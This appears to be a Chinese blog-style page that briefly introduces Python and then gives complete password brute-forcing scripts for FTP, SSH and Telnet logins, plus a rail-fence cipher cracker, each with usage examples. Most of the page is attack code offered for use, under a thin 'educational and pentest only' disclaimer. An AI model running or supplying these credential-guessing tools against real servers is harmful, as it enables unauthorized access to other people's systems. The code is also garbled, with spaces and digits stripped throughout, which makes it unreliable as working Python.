Python是一种计算机程序设计语言。是一种面向对象的动态类型语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。
Python脚本简单易用,对于要破解的栅栏密码,最简单的可以使用快速编写的Python脚本进行暴力破解:
通用脚本:
#!/usr/bin/envpython
#-*-coding:gbk-*-
#-*-coding:utf_-*-
e=raw_input(‘请输入要解密的字符串\n‘)
elen=len(e)
field=[]
foriinrange(,elen):
if(elen%i==):
field.append(i)
forfinfield:
b=elen/f
result={x:‘‘forxinrange(b)}
foriinrange(elen):
a=i%b;
result.update({a:result[a]+e[i]})
d=‘‘
foriinrange(b):
d=d+result[i]
print‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为:‘+d
FTP暴力破解脚本
#!/usr/bin/envpython
#-*-coding=utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
importsys,os,time
fromftplibimportFTP
docs="""
[*]Thiswaswrittenforeducationalpurposeandpentestonly.Useitatyourownrisk.
[*]Authorwillbenotresponsibleforanydamage!
[*]Toolname:ftp_bf.py
[*]Coder:
[*]Version:.
[*]eampleofuse:pythonftp_bf.py-tftp.server.com-uusernames.txt-ppasswords.txt
"""
ifsys.platform=='linux'orsys.platform=='linux':
clearing='clear'
else:
clearing='cls'
os.system(clearing)
R="\[m";
G="\[m";
Y="\[m"
END="\[m"
deflogo():
printG+"\n|---------------------------------------------------------------|"
print"||"
print"|blog.sina.com.cn/kaiyongdeng|"
print"|//ftp_bf.pyv..|"
print"|FTPBruteForcingTool|"
print"||"
print"|---------------------------------------------------------------|\n"
print"\n[-]%s\n"%time.strftime("%X")
printdocs+END
defhelp():
printR+"[*]-t,--targetip/hostname<>Ourtarget"
print"[*]-u,--usernamelistusernamelist<>usernamelistpath"
print"[*]-p,--passwordlistpasswordlist<>passwordlistpath"
print"[*]-h,--helphelp<>printthishelp"
print"[*]Example:pythonftp_bf-tftp.server.com-uusername.txt-ppasswords.txt"+ENDsys.exit()
defbf_login(hostname,username,password):
#sys.stdout.write("\r[!]Checking:%s"%(p))
#sys.stdout.flush()
try:
ftp=FTP(hostname)
ftp.login(hostname,username,password)
ftp.retrlines('list')
ftp.quit()
printY+"\n[!]wt,wt!!!Wedidit!"
print"[+]Target:",hostname,""
print"[+]User:",username,""
print"[+]Password:",password,""+END
return
#sys.exit()
exceptException,e:
passexceptKeyboardInterrupt:printR+"\n[-]Exiting...\n"+END
sys.exit()
defanon_login(hostname):
try:
printG+"\n[!]Checkingforanonymouslogin.\n"+END
ftp=FTP(hostname)ftp.login()
ftp.retrlines('LIST')
printY+"\n[!]wt,wt!!!Anonymousloginsuccessfuly!\n"+END
ftp.quit()
exceptException,e:
printR+"\n[-]Anonymousloginfailed...\n"+END
pass
defmain():
logo()
try:
forarginsys.argv:
ifarg.lower()=='-t'orarg.lower()=='--target':
hostname=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-u'orarg.lower()=='--usernamelist':
usernamelist=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-p'orarg.lower()=='--passwordlist':
passwordlist=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-h'orarg.lower()=='--help':
help()
eliflen(sys.argv)<=:
help()
except:
printR+"[-]Cheakyourparametarsinput\n"+END
help()
printG+"[!]BruteForcingtarget..."+END
anon_login(hostname)
#print"hereisok"
#printhostname
try:
usernames=open(usernamelist,"r")
user=usernames.readlines()
count=
whilecount<len(user):
user[count]=user[count].strip()
count+=
except:
printR+"\n[-]Cheakyourusernamelistpath\n"+END
sys.exit()
#print"hereisok",usernamelist,passwordlist
try:
passwords=open(passwordlist,"r")
pwd=passwords.readlines()
count=
whilecount<len(pwd):
pwd[count]=pwd[count].strip()
count+=
except:
printR+"\n[-]Checkyourpasswordlistpath\n"+END
sys.exit()
printG+"\n[+]Loaded:",len(user),"usernames"
print"\n[+]Loaded:",len(pwd),"passwords"
print"[+]Target:",hostname
print"[+]Guessing...\n"+END
foruinuser:forpinpwd:
result=bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
ifresult!=:
printG+"[+]Attemptuaername:%spassword:%s..."%(u,p)+R+"Disenable"+END
else:
printG+"[+]Attemptuaername:%spassword:%s..."%(u,p)+Y+"Enable"+END
ifnotresult:
printR+"\n[-]Thereisnousernameanspasswordenabledinthelist."
print"[-]Exiting...\n"+END
if__name__=="__main__":
main()
SSH暴力破解
#!/usr/bin/envpython
#-*-coding=UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
importsys
importos
importtime
#fromthreadingimportThread
try:
fromparamikoimportSSHClient
fromparamikoimportAutoAddPolicy
exceptImportError:
printG+'''
Youneedparamikomodule.
http://www.lag.net/paramiko/
Debian/Ubuntu:sudoapt-getinstallaptitude
:sudoaptitudeinstallpython-paramiko\n'''+END
sys.exit()
docs="""
[*]Thiswaswrittenforeducationalpurposeandpentestonly.Useitatyourownrisk.
[*]Authorwillbenotresponsibleforanydamage!
[*]Toolname:ssh_bf.py
[*]Author:xfk
[*]Version:v..
[*]Exampleofuse:pythonssh_bf.py[-Ttarget][-Pport][-Uuserslist][-Wwordlist][-Hhelp]
"""
ifsys.platform=='linux'orsys.platform=='linux':
clearing='clear'
else:
clearing='cls'
os.system(clearing)
R="\[m";
G="\[m";
Y="\[m"
END="\[m"
deflogo():
printG+"\n|---------------------------------------------------------------|"
print"||"
print"|blog.sina.com.cn/kaiyongdeng|"
print"|//ssh_bf.pyv..|"
print"|SSHBruteForcingTool|"
print"||"
print"|---------------------------------------------------------------|\n"
print"\n[-]%s\n"%time.ctime()
printdocs+END
defhelp():
printY+"[*]-H--hostname/ip<>thetargethostnameoripaddress"
print"[*]-P--port<>thesshserviceport(defaultis)"
print"[*]-U--usernamelist<>usernameslistfile"
print"[*]-P--passwordlist<>passwordslistfile"
print"[*]-H--help<>showhelpinformation"
print"[*]Usage:python%s[-Ttarget][-Pport][-Uuserslist][-Wwordlist][-Hhelp]"+END
sys.exit()
defBruteForce(hostname,port,username,password):
'''
CreateSSHconnectiontotarget
'''
ssh=SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname,port,username,password,pkey=None,timeout=None,allow_agent=False,look_for_keys=False)
status='ok'
ssh.close()
exceptException,e:
status='error'
pass
returnstatus
defmakelist(file):
'''
Makeusernamesandpasswordslists
'''
items=[]
try:
fd=open(file,'r')
exceptIOError:
printR+'unabletoreadfile\'%s\''%file+END
pass
exceptException,e:
printR+'unknownerror'+END
pass
forlineinfd.readlines():
item=line.replace('\n','').replace('\r','')
items.append(item)
fd.close()
returnitems
defmain():
logo()
#print"hellowold"
try:
forarginsys.argv:
ifarg.lower()=='-t'orarg.lower()=='--target':
hostname=str(sys.argv[int(sys.argv[:].index(arg))+])
ifarg.lower()=='-p'orarg.lower()=='--port':
port=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-u'orarg.lower()=='--userlist':
userlist=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-w'orarg.lower()=='--wordlist':
wordlist=sys.argv[int(sys.argv[:].index(arg))+]
elifarg.lower()=='-h'orarg.lower()=='--help':
help()
eliflen(sys.argv)<=:
help()
except:
printR+"[-]Cheakyourparametarsinput\n"+END
help()
printG+"\n[!]BruteForcingtarget...\n"+END
#print"hereisok"
#printhostname,port,wordlist,userlist
usernamelist=makelist(userlist)
passwordlist=makelist(wordlist)
printY+"[*]SSHBruteForcePraparing."
print"[*]%suser(s)loaded."%str(len(usernamelist))
print"[*]%spassword(s)loaded."%str(len(passwordlist))
print"[*]BruteForceIsStarting......."+END
try:
forusernameinusernamelist:
forpasswordinpasswordlist:
printG+"\n[+]Attemptuaername:%spassword:%s..."%(username,password)+END
current=BruteForce(hostname,port,username,password)
ifcurrent=='error':
printR+"[-]O*OTheusername:%sandpassword:%sIsDisenbabled...\n"%(username,password)+END
#pass
else:
printG+"\n[+]^-^HaHa,WeGotIt!!!"
print"[+]username:%s"%username
print"[+]password:%s\n"%password+END
#sys.exit()
except:
printR+"\n[-]ThereIsSomethingWrong,PleaceCheakIt."
print"[-]Exitting.....\n"+END
raise
printY+"[+]Done.^-^\n"+END
sys.exit()
if__name__=="__main__":
main()
#!usr/bin/python
#TelnetBruteForcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
importthreading,time,random,sys,telnetlib
fromcopyimportcopy
iflen(sys.argv)!=:
print"Usage:./telnetbrute.py<server><userlist><wordlist>"
sys.exit()
try:
users=open(sys.argv[],"r").readlines()
except(IOError):
print"Error:Checkyouruserlistpath\n"
sys.exit()
try:
words=open(sys.argv[],"r").readlines()
except(IOError):
print"Error:Checkyourwordlistpath\n"
sys.exit()
print"\n\tdhydr[at]gmail[dot]comTelnetBruteForcerv."
print"\t--------------------------------------------------\n"
print"[+]Server:",sys.argv[]
print"[+]UsersLoaded:",len(users)
print"[+]WordsLoaded:",len(words),"\n"
wordlist=copy(words)
defreloader():
forwordinwordlist:
words.append(word)
defgetword():
lock=threading.Lock()
lock.acquire()
iflen(words)!=:
value=random.sample(words,)
words.remove(value[])
else:
print"\nReloadingWordlist-ChangingUser\n"
reloader()
value=random.sample(words,)
users.remove(users[])
lock.release()
iflen(users)==:
returnvalue[][:-],users[]
else:
returnvalue[][:-],users[][:-]
classWorker(threading.Thread):
defrun(self):
value,user=getword()
try:
print"-"*
print"User:",user,"Password:",value
tn=telnetlib.Telnet(sys.argv[])
tn.read_until("login:")
tn.write(user+"\n")
ifpassword:
tn.read_until("Password:")
tn.write(value+"\n")
tn.write("ls\n")
tn.write("exit\n")
printtn.read_all()
print"\t\nLoginsuccessful:",value,user
tn.close()
work.join()
sys.exit()
except:
pass
forIinrange(len(words)*len(users)):
work=Worker()
work.start()
time.sleep()</wordlist></userlist></server>